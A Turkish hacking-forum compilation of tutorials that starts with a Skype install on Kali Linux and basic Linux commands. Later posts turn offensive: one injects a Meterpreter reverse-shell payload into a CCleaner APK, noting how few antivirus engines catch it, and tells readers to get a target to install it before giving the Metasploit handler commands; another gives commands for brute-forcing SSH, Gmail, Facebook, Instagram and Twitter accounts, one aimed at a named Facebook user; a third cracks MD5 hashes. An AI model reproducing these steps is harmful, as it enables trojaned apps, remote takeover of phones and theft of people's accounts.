-->

Kali Linux Skype Kurulumu

Selamun ALeyküm 

https://www.skype.com/tr/download-skype/skype-for-computer/
Adresinden Skypeyi İndirin

Terminaldan İndirdiğiniz Dosyanın Bulunduğu Dizine Gidin.

dpkg -i skypeforlinux-64.deb 
Komutu İle İnstall Ediyoruz Bu Kadar.




Sonuç :


Resim Boyutlari İçin Kusura Bakmayin :)

Kali Linux 2016.2 Üzerine Kurulmuştur.
 

Temel Linux Komutlari


 Kali Nedir ? 

 Kali Bir Linux Dağıtımıdır. Güvenlik Testleri Gerçekleştiren Offensive Security Araçlarını Bünyesinde Barindiran Bi Linux Dağıtımıdır. İçerisinde Hali Hazırda 300 'den Fazla Araç Vardir. Araçlarin Listesi İçin Tikla. 2013 Yılında BackTrack Yapımcıları Tarafından Oluşturulmuş Olan Bir Güvenlik Kontrol İşletim Sistemi. Offensive Security Ltd. Aracılığyla Mati Aharoni, Devon Kearns Ve Raphael Hertzog Tarafından Geliştirilmekte Ve Finanse Edilmektedir.
 https://www.kali.org/downloads/ Adresinden Üye Olmadan 64 Veya 32 Bitlik Sürümünü İndirebilirsiniz.
 Kali Linux Bir Bilgisayarin Sabit Diskine Yüklenerek Çalışabilir Veya Bir CD Ve USB'den Önyüklenebilir Yada Sanallaştırma Programlari İle Çaliştirilabilir.
Kurulumu İçin Aşağidaki Linklere Göz Atin.
1
2
3
4

 Temel Linux Bilgisi
 Temel Linux Komutlari : 

 Terminal : Terminal Gnome Masaüstü Araxının Komut Satiri Aracidir. Kali Grafik Arayüzüne Sahip Olsada Komut Satırinda (Terminal) Grafik Ara Biriminde Yapılanlardan Daha Çok Eylem Gerçekleştirebilir. 

 Linuxda Bir Çok Komut Ve Parametre Yer Almaktadir. Bu Parametreler Komut Adı Yazıldıktan Sonra Bi Boşluk Birakılarak Yazılmalidir. Genellikle Parametreler "-" İle Başlamaktadir.

 Temel Kural: Komut + Alacaği Parametre
 Komut Hakkinda Bilinmek İstenen Her Şey İçin Man + Komut Yeterlidir.

man Komutu: 
Manuel İfadesinin Kısaltmasidir Man. Bu Komut Linux Sistemlerde Bir Komut Veya Bir Yazilim Hakkinda Bilgi Almayi Sağlar:
Örnek:  man sqlmap

Aklıma Gelmişken Whatis Komutunuda Belirteyim. Whatis Komutuda Man Komutuna Benzer Ancak Man Komutu Kadar Ayrıntıları Göstermez.

 pwd Komutu :  
 Pwd Komutu, Print Working Directory, Bulunduğumuz Dizini Ekrana Yazan Komuttur. 

Yani Terminali İlk Açtıgımızda /root Dizininde Oluyoruz.
Peki Dowloands Desktop (Masaüstü) Klasörüne Terminal Üzerinden Geçmek İçin Ne Yapmaliyiz?

 cd Komutu:
cd Komutu - Change Directory Kelimesinin Kısaltılmışıdır. Bu Komut İle Dizinler Veya Klasörler Arası Geçiş Yapılabilmektedir.
 " cd .. " Komutu İle Bir Üst Dizine/Klasöre Geçiş Yapılır.
 Örnek Olarak Desktop'a Yani Masaüstüne Geçiş Yapalım.
cd Desktop
pwd
cd .. Bu Komut İle Bir Üst Dizine Geçilir.

ls Komutu: 
ls Komutu Dosya, Dizin Listelemek Ve Özelliklerini Görüntülemek İçin Kullanılır.

a Parametresi Gizli Dosyalari Gösterir (cache Vb)
l Parametresi Detayli Listemele Sağlar 
h Parametresi Dosya Boyutlarını Görmenizi Sağlar
Detayli Bilgi İçin: man ls

Burada Bulunan rwrx 'leri Kısaca Açıklamak Gerekirse
d: Dizin
r : Okuma İzni
w: Yazma İzni 
x: Yürütme İzni 
rwx : Kullanici Okuyabilir, Yazabilir, Çaliştirilabilir
r-x : Grup Okuyabilir, Çaliştirilabilir Yazamaz.
r-x : Diğerleri Okuyabilir, Çaliştirilabilir Fakat Yazamaz
Bütün İzinleri Kapatılmıs Bir Dosya Şöyle Görünür:
----------
Cat Komutu : 
Cat Komutu Dosya İçeriğini Okumak Görüntülemek İçin Kullanilir.
Bakalim Desktop'ta Bulunan cw.txt Adli Metin Belgesinin İçinde Ne Varmiş.

Ek Olarak Bu İşlemi 
leafpad cw.txt
gedit cw.txt 
nano cw.txt
Yazarakda Açabilirsiniz.

Echo Komutu : 
Echo Komutu Kendinden Sonra Yazılan İfadeyi Ekrana Yazdirir.
Ayrıca Ortam Değişkenlerinide Başına $ Koyarak Yazdirabiliriz.


Ek Olarak Echo Komutuyla Çıkti Yönlendirebilirsiniz.
Burada;
 echo " Komutuyla Olusacak test.txt Belgesinin İçerigini Yazdık Sonra Olusacak Belgenin Adını Belirttik" test.txt

More Komutu: 
More Komutu İçeriği Fazla Olan Dosyalari Okumak İçin Kullanilir Dosyanin Terminale Sığacak Kadar Olan Kısmını Gösterir Devamini Görmek İçin Space (Boşluk) Tuşu Kullanilir.
Kuu (q) Tuşu İle İstenilen Yerde Dosya Kapatilir. 

 Less Komutu : 
Less Komutu More Komutuna Benzer Komuttur. Tüm İçeriği Hafizaya Almadiği İçin Büyük Dosya İçeriğini Okumak İçin Tercih Edilmektedir.
less pass.txt

Head Komutu: 
Head Komutu Belirtilen Belgenin İlk 10 Satırını Görüntülemenizi Sağlar
-n Paramatresi İle Verilen Değer Kadar Satiri Görüntüler.

Tail Komutu : 
Tail Komutu Head Komutuna Benzer.  Parametresiz Açtığinizda Dosyanin İlk 10 Satirini Görüntüler.
-n Parametresi İle Kullanildiğinda Dosyanin Sonundan -n Parametresine Verilen Değer Kadar Satiri Görüntüler.

Grep Komutu
Greep Komutu Kelime Arama Komutudur. Verilen Belge İçerisinde İstenilen Kelimeyi Uygun Satira Getirir.
-i Büyük Küçük Harf Duyarsizliği Parametresidir.
Daha Fazla Bilgi : man grep


Uname Komutu:
Uname Komutu Sistem Bilgilerini Görüntülemek İçin Kullanılir.
Bu Bilgiler Makina Donanim Tipi, Network, Hostadi, İşletim Sistemi Ve İşlemci Tipi İle İlgili Bilgilerdir.
-a Parametresi Tüm Bilgileri Getir.
Ayrintili Bilgi: man uname

Hostname Komutu:
Hostname Komutu Adini Görüntüleyen Ve Değiştirebilen Komuttur.
mevcut hostadı trazer
Değiştirmek İçin : echo "yenihostadiniz" > /etc/hostname
Yeni Terminal Açtığınızda Değişecektir.

Pipe Komutu: 
Pipe Komutuyla Bir Komutun Çıktısı, Diğer Bir Komuta Girdi Olarak Verilebilir.
head cw.txt | grep "cyber" 
Bu Komut cw.txt Dosyasının İçeriğini Grep Komutuna Aktarir Grep Komutuda "cyber" Kelimesinin Geçtigi Satırlari Ekrana Yazdirir. 

Mkdir Komutu: 
Yeni Dizin Oluşturmak İçin Kullanilir.
Örnek: mkdir siberakademi

Rmdir Komutu : 
Dizin Silmek İçin Kullanılır Ancak Silinecek Dizinin Boş Olması Gerekir.
Bu Komutla Biraz Önce Oluşturduğumuz Dizini Sildik :)
Eger Dizinin İçi Doluysa Tüm Dosyalarla Birlikte Silmek İstiyorsak:
rmdir -R silinecek_dosya

Touch Komutu: 
Touch Komutu Boş Bir Belge Oluşuturur Bulundugunuz Dizinde.

Cp Komutu:
Cp Komutu Copy Pastenin Kısaltılmış Halidir Adındanda Anlayacağiniz Gibi Kopyala Yapıştir İşine Yarar. Az Önce Oluşturdugumuz siberakademi Dosyasını Downloads Yani İndirilenler Klasörüne Kopyalayalim.
örnek: cp kopyalanıcak_dosya /root/kopyalanacak_dizin/yada_dizin_adi
Not: Bu Komut Dizin Kopyalamaz Sadece Dosya Kopyalar.


Mv Komutu:
mv Komutu Dosya Taşımaya Yarar
Örnek: mkdir cyber Komutu İle Bi Dosya Olusturalim.
mv cyber /root/Downloads/ Bu Dosyayi Downloads Klasörüne Taşıyalim.
Bu Komut İle Aynı Zamanda Dosya Ismide Değiştirebilirisniz.
mv dosya_adi yeni_dosya_adi

Tar Komutu: 
Tar Komutu Linux İşletim Sistemlerinde Dosya/Klasör Arşivlemeye Yarar. Windowsdaki Winrara Benzer. Ancak Sıkıştırma Yapmaz Arşiv Dosyası İçinde Saklamaya Yarar.
Downloands Klasoründe Bulunan cw cyber1 siberakdemi Dosya Ve Dizinlerini Arşivleyelim.
tar cvf yedek.tar cw cyber1 siverakademi
Olusan yedek.tar Arşiv Dosyamızı Tekrar Dışarıya Çıkartmak İçin :
tar xvf yedek.tar

Tar Komutu Parametreleri:
-c Create: Tar Dosyasının Yaratılacağını Belirtir.
-x Extraxt : Bir Tar Dosyasinin Açılacağını Belirtir.
-t Tabel Of Contents: Bir Tar Dosyasının İçeriğinin Listeleneceğini Belirtir.
-v Verbose :  Bir Tar Dosyasının Yaratılırken Yada Açılırken Elden Geçen Dosyalarin İsimlerinin Ekrana Listelemek İçin Kullanılır.
-z Tar Dosyasının Sıkıştırılmış Bir Dosya Olarak Kullanılacağini Belirtir. Gunzip Kullanacaktir.
-f File: Oluşturulacak,Açılacak Yada İçindekiler Tablosu Listelenecek Tar Dosyasının Adını Komut Satırında Verileceğini Belirtir.
Ayrintili Bilgi : man tar

gzip:
Tar Dosyalarını Sıkıştırmaya Yarar:
örnek:
gzip yedek.tar

Bu Komutla yedek.tar Dosyamızın Adı Artık yedek.tar.gz Olur. Bu Yöntemle Dosyalarınızı Sıkıştırabilirisniz. Eski Haline Getirmek İçin: gzip -d yedek.tar.gz

Zip İle Sıkıştırma Açma
zip İle Dosya Sıkıştırmak İçin
zip -r zipismi.zip ziplenecek_dosya

Ziplenmiş Dosyayi Açmak İçin:
unzip zipismi.zip
Aynı Dizinde Aynı Dosya Var Oldugu İçin Değiştirilsinmi Diye Soruyor All Hepsini Değiştir Diyerek Onaylaıyoruz:)

Mevcut Zipiniz Şifreliyse Açmak İçin :
unzip -P şifre zipismi.zip

Rar İle Dosya Sıkıştirma Açma
Dosya Sıkıştırmak İçin
rar a -ap dosyaismi.rar rarlanacak_dosya

Rar Açmak İçin: unrar e açılacak_rar.rar

Şifreli Dosya Sıkıştırmak İçin :
rar a -ap -p sıfrelidosya.rar şifrelenecek_dosya
Not: 2 Kez Şifre Girmeniz İstenir. Yazarken Şifreniz Görünmez.

Şifreli Rar Açmak İçin:
unrar e -p Şifre açılacak_rar.rar

Kali Linuxsa Program Yüklemek Yada Kaldırmak İçin Bu Linke Göz Atın

Cyber-Warrior Siber Akademi Kali Linux Dersleri İçin Farkli Kaynaklardan Derlenip Toplanmıştır.


Kali Linux Android Hack 2

Selamun Aleyküm ..


Kwetza, Android Uygulamalarinin Varsayilan İzinlerini Kullanarak İşlevsellik Kazanmak İçin Gerekli İzinleri Oluşturup Bu İzinleri Mevcut Android Uygulamasina (APK) Enjekte Etememize Yarar.
 Yani Kısaca Mevcut Bi Android Uygulamasına Meterpreter Payloadı Enjekte Etmenizi Sağlar.
git clone https://github.com/sensepost/kwetza.git
Yazarak İndrin
Kwetza Piton İle Yazılmıştır Ve PİP Kullanarak Kurulabilen BeautifulSoup Gerektirir.
pip install beautifulsoup4
Kullandığınız İşletim Sisteminde Apktool'un Kurulu Olması Gerekiyor Eğer Değilse Buradan Bakıp İndirip Yükleyin Yada apt-get install apktool
Şimdi Hedef Bi Tane Android Uygulaması Bulun Yani Karşı Tarafa Göndereceğimiz Apk Ben Cclenear Uygulamasının Apk'sini İndirdim Bu Apk Bir Oyun Olabilir Yada Başka Birşey. Ccleaner-pro.apk 'sini Kwetza Klasörünün İçine Attım Ardından chmod +x kwetza.py Yazarak Gereken İzinleri Verdik.


Yeni Bi Terminal (Komut Satiri) Açip ifconfig Yazarak Yerel İp Adresimizi Öğreniyoruz.
192.168.38.128
python kwetza.py ccleaner.apk 192.168.1.9 4444 yes
Yazarak Zararli Android Uygulamamizi Oluşturuyoruz.
ccleaner.apk Paylod Enjekte Edeceğimiz Apk
192.168.1.9 Bağlantı Sağlayacığımız İp Adresi
4444 Bağlantı Sağlayacağımız Port Numarası 
Oluşturmaya Başladıktan Sonra Bizden  Şifre Girmemizi İstiyor Default Olarak password Yazıp Onaylıyoruz Ve Zararli Uygulamamizi Oluşturdu
Zararlı Uygulamamizi Kwetza Klasörünün İçine Uygulamamız Adında Dosya Oluşturup Dist Dosyasının İçine ccleaner.apk Olarak Kayıt Etti.
Virüs Total Sonucu Burada
59 Antivürüsden 6 Tanesi Yakaladi Neyse Bu Olusturdugumuz Apk yi Bir Şekilde Hedefe Gönderip Telefona Kurmasını Sağlıyoruz Ardından Metasploit'i Açıp Gerekli Exploiti Ve Payloadı Belirtip Ayarları Yaptıktan Sonra Exploit Ediyoruz

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 4444
exploit 
Yazarak Exploit Ediyoruz Ve Oturum Açılıyor
Normalde Bu Apk yi Test Edicektim Ancak Diğer Pc de Sıkıntı Yaşadım O Yüzden Test Etme Şansım Olmadı Umarım Anlasılır OLmustur...

TrazeR Sunar /

Kali Linux Facebook İnstagram Twitter Brute Force

Selamun Aleyküm ..

Brut3k1t Çeşitli Protokoller İçin Sözlük Saldirilarini Destekleyen Bir BruteForce Modülüdür.
Tamamlanmiş Ve Desteklenen Mevcut Protokoller Şunlardir : 

Protokoller:
Ssh
Ftp
Smtp
Xmpp

Web Tabanli Hizmetler:
İnstagram
Facebook
Twitter

Kurulum:

Kurulum Basittir. Brut3k1t, Bazı Bağımlılıkları Gerektirir Bu Bağımlılıklar, extras Klasöründe Bulunan installer.py Yürütülebilir Dosyasını Çalıştırarak Yüklenir.

git clone https://github.com/ex0dus-0x/brut3k1t


cd Desktop/
cd brut3k1t/
cd extras/
ls
python installer.py

Sistem Numaranızı Yazıp Onaylayın

Gerekli Paketlerin Yüklemenmesini Bekleyin.

Kurulumda Hata Alirsaniz Gerekli Bağımlılıklari Manuel Yükleyniz.

Kullanim Örnekleri:
192.168.1.3 İp Adresi Üzerinde Çalışan SSH'ye Bruteforce İçin
SSH: python brut3k1t.py -s ssh -a 192.168.1.3 -u root (kullanici adi) -w wordlistyolu.txt
Program Otomatik Olarak Bağlanti Noktasini 22 Olarak Ayarlar Port Farkliysa -p Parametresiyle Portu Belirtiniz.

Gmail: test@gmail E-postasını Wordlist.txt ile 25 Numarali Bağlanti Noktasindan 3 Saniye Gecikmeli Olarak Kirma. E-posta İçin SMTP Sunucusunun Adresini Kullanmaniz Gerekir. Örnegin, Gmail= smtp.gmail.com Diğer Mail Servislerinin Smtp Adreslerini Google de Arayarak Bulabilirsiniz.
python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlistyolu.txt -p 25 -d 3

XMPP: test@creep.im 'i Varsayilan Port 5222 Wordlist.txt İle Bruteforce.
XMPP Aynı Zamanda SMTP'ye Benzer, XMPP Sunucusunun Adresini Sağlamanız Gerekecektir. (Bu Kısmı Bende Pek Anlayamadim)
python brut3k1t.py -s xmpp -a creep.im -u test(k.adi) -w wordlistyolu.txt

Facebook: Facebook Brute Force İçin Kullanici Adi, E-Posta, Telefon Numarasi Gerektirir.

python brut3k1t.py -s facebook -u kullaniciadi -w wordlistyolu.txt

İnstagram : Kullanici Adi Test Olan İnstagrami Wordlist İle 5 Saniyelik Gecikme İle Bruteforce

python brut3k1t.py -s instagram -u test -w wordlistyolunuz.txt -d 5

Twitter: Kullanici Adi Test Olan Twitterra Wordlist İle  Bruteforce

python brut3k1t.py -s twitter -u test -w wordlistyolunuz.txt
Örnek Facebook Brute Force :
python brut3k1t.py -s facebook -u sahink.754 -w  /root/Desktop/passss.txt -d 15




-d Parametresi İle Süre Belirtin Yoksa Ben Gibi Banlanırsınız :)
Bu Arada Resim Boyutu İçin Kusura Bakmayın


Şifreyi Kırdığında Otomatik Olarak Login OLuyor.

TrazeR Sunar //

Hash Kracker Console (Windows) Md5 Decrypt

Selamun Aleyküm 

Geçen Gün Bi Arkadaşımız Hash Kırmak İçin Program Soruyordu Onun Sorusuna Cevaben Bu Konuyu Hazırlamak İstedim. Bu Kullanacagımız Araç Windows İşletim Sistemlerinde MD5'i  Decrpyt Etmeye Yarar. Kısaca Brute Force Yapar

Hashkracker.zip Dosyasını İndirip Masaüstüne Zipten Çıkartıyoruz

İçinde Default Olarak passlist.txt Adında Bi Metin Belgesi Geliyor Bu Metin Belgesinin İçinde Bazı Sözcükler Şifreler Var Dilerseniz Kendiniz Bir Wordlist Hazırlayabilirsiniz Yada Buradaki Adresten Hazır Wordlist İndirebilirsiniz.

Windowsda Komut İstemini (cmd) Açarak İndirdiğimiz Hashcracker Dizinine Giriyoruz.

cd Desktop
cd hashkracker
hashkrackerconsole.exe 
Yazarak Kullanımı Ve Parametreleri Hakkında Bilgi Alabilirsiniz.


hashkracker -d -f  Wordlist Yolu Kırılacak Hash
Yazarak Brute Force İslemını Başlatıyoruz


Devam Etmek İçin Bir Tuşa Basıyoruz

Passlist.txt Dosyamızın İçinde Bulunan Kelimeleri Tek Tek Deneyerek Kısa Sürede Şifrelenmis Kelimeyi Buldu  ;
(Bu İşlem Wordlist Boyutuna Göre Uzayip Kısalabilir.)

MD5 : bbf2dead374654cbb32a917afd236656
Decrypt : ABC123

Şimdi Başka Bi Şekilde Brute Force Yapalım 
Hashkrackerconsole -b -m 4 -l 6 -c ABCDEFGH123456 bbf2dead374654cbb32a917afd236656

Buradaki Parametrelerin Açıklamasını Yapalım ; 
-b Bruteforce Crack
-m Minimum Şifre Uzunlıuğu
-l Maksimum Şifre Uzunluğu
-c Denenecek Parola Modeli


Devam Etmek İçin Bir Tuşa Basıyoruz

Sonuç: ABC123

 Hashkracker Console Download
 Hashkracker Altarnatif

TrazeR Sundu //

EDİT : 
Viristotal Link

4 A.v Tarafindan ; W32.eHeur.Malware08 , Hacktool.Secxpld.PS4 Olarak Algılanmaktadir Kendi Bilgisayarımda Kullandıgım Bi Araç Herhangi Bir Sıkıntıyla Karşılaşmadim.